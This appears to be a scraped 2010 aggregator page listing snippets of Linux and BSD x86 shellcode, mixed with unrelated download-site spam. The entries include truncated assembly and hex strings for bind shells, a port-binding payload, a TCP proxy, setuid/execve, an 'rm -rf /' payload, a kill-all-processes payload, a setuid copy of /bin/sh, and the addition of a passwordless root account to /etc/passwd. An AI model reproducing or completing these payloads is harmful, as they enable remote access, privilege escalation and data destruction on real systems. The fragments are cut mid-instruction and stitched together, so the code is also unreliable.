Online Linux Shellcode

BITS 32 ;next generation hellcode ;mmap memory segment for ...

Online Linux Shellcode - Fri, 09/03/2010 - 16:02
... eax push eax push edx push ecx push ebx push eax mov ebx, esp mov al, 0x5a int ... [edx+0x4] push byte + 0x21 pop eax int 0x80 cmp al, 0 jne label1 mov eax, ...

<!DOCTYPE xhtml PUBLIC "-/W3C/DTD XHTML 1.0 ...

Online Linux Shellcode - Thu, 09/02/2010 - 15:02
global _start _start: xor %eax, %eax movb $102, %al mov %eax, %esi ... ecx movb $63, %al int $0x80 movb $63, %al dec %ecx int $0x80 # exec shell jmp 1f 2: ...

linux/x86 rm -rf / attempts to block the process from being ...

Online Linux Shellcode - Wed, 09/01/2010 - 12:02
... xD2" // xor edx, edx "\x04\x0B" // add al, 0xb ; sys_execve "\xCD\x80"; // int 0x80 (*(void (*)()) shellcode)(); } // milw0rm.com [2008-08-18] ...

Online Linux Shellcode: bindshell.asm

Online Linux Shellcode - Wed, 09/01/2010 - 12:02
global _start _start: xor %eax, %eax movb $102, %al mov %eax, %esi # socketcall ... int $0x80 # sys_accept mov %esi, %eax inc %ebx int $0x80 push %eax ...

Linux/x86 Port Binding Shellcode (xor-encoded) 152 bytes

Online Linux Shellcode - Wed, 09/01/2010 - 12:02
... pop eax int 0x80 ;listen mov al, 0x66 mov bl, 0x04 int 0x80 ;accept push edx push esi ... void (*shellcode)(); shellcode = (void *)code; shellcode(); return (0) ...

bsd/x86 setuid/execve shellcode 30 bytes

Online Linux Shellcode - Wed, 09/01/2010 - 12:02
... setuid-bsd.c - setuid/execve shellcode for *BSD/x86 * Copyright ... 20e3: b0 3b mov $0x3b,%al * 20e5: cd 80 int $0x80 */ char sc[] = /* 7 + 23 = 30 bytes */ "\x31\xc0\x50\x50 ...

linux/x86 TCP Proxy Shellcode 236 bytes

Online Linux Shellcode - Wed, 09/01/2010 - 12:02
deliver shellcode however you would normally deliver shellcode to a machine, lets say 192. ... xcd\x80" // int $0x80 ;fork "\x85\xc0" // test %eax,%eax "\x75\xe2" ...

netbsd/x86 kill all processes shellcode 23 bytes

Online Linux Shellcode - Wed, 09/01/2010 - 12:02
... 1 push eax xor eax,eax mov al, 37 push eax int 0x80 -end-if we dissasemble this code wi will get shellcode "\x66\x31\xc0\x68\x09\x00\x66\xb8 ...

D

Online Linux Shellcode - Fri, 08/27/2010 - 07:02
10 times Size 34 bytes OS *BSD /rootteam/dev0id (www.sysworld.net) dev0id ... mov al,0x3d push eax int 0x80 */ char shellcode[] = "\x31\xc9\x31\xc0\x50\xb0 ...

lnx-smart.asm

Online Linux Shellcode - Wed, 08/25/2010 - 05:02

linux/x86 cp /bin/sh /tmp/katy ; chmod 4555 katy 126 bytes

Online Linux Shellcode - Sun, 08/22/2010 - 02:02
0x96d,%cx movb $0xf,%al int $0x80 xorl %eax,%eax inc %eax xorl %ebx,%ebx int $0x80 call -0x63 .ascii \"/bin/cp8/bin/sh8/tmp/katy\" "); */ /*RaiSe ...

dual.asm

Online Linux Shellcode - Sat, 08/14/2010 - 16:02
... Hello World Shellcode for Linux and BSD #Program by: lockdown (www.lockeddown.net) #Date: July 26, 2001 #The following code was used to make the above shellcode. ...

exit.asm

Online Linux Shellcode - Wed, 08/11/2010 - 13:02
... Hanna ;shanna@uiuc.edu ;http://www.vividmachines.com/ ;Linux Shellcode ;exit.asm shellcode example ;this shellcode just calls sysexit [SECTION .text] ...

Free colour.asm Download - colour.asm Files

Online Linux Shellcode - Mon, 08/09/2010 - 11:03
Free download colour.asm Files at Software Informer - Zeta Debugger is a stand-alone source level debugger and code profiler for applications written for Windows 98 ...

linux/x86 add root user r00t with no password to /etc/passwd ...

Online Linux Shellcode - Sat, 08/07/2010 - 00:02
... (ebx) * * push byte 6 * pop eax * int 0x80 * * ; exit() * * push byte 1 * pop eax * int 0x80 */ main() { char shellcode[] = "\x6a\x05\x58\x31\xc9 ...

echo.asm

Online Linux Shellcode - Sat, 08/07/2010 - 00:02
... _start: jmp 1f 2: xor %eax, %eax mov %eax, %edx movb $1, %al mov %eax, %ebx pop %ecx movb $3, %dl movb $4, %al int $0x80 1: call 2b .ascii "LQ\n" ...

sys_write.asm

Online Linux Shellcode - Mon, 08/02/2010 - 20:02
The message string goes at the end of the shellcode, * and is terminated with 0xFF. ... int 0x80 "\xb0\x01" // mov al, 0x01(sys_exit) "\xcd\x80" // int ...

Free cmos .asm Download - cmos .asm Files

Online Linux Shellcode - Sat, 07/31/2010 - 15:02
Free download cmos .asm Files at Software Informer - Zeta Debugger is a stand-alone source level debugger and code profiler for applications written for Windows 98 ...

affichage-shell.asm

Online Linux Shellcode - Wed, 07/21/2010 - 02:02
;affichage-shell.asm segment .data cheminshell db "/bin/sh0aaaabbbbb" ... int 0x80 mov eax,0 mov ebx,cheminshell mov [ebx+7],al mov [ebx+8],ebx mov [ebx+12] ...

jsbachportshell.asm

Online Linux Shellcode - Fri, 07/02/2010 - 02:02
... is only 135 bytes (ADM's portshell shellcode is 238 bytes, # prym's is 179) # code is ... ecx /* ++ecx == 1 */ int $0x80 movl %edx, %eax incl %ecx int $0x80 /* load the string ...
Syndicate content